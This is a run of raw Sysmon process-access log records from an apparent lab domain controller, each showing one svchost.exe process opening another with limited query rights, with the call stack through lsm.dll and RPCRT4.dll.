10341000x80000000000000004844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.106{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
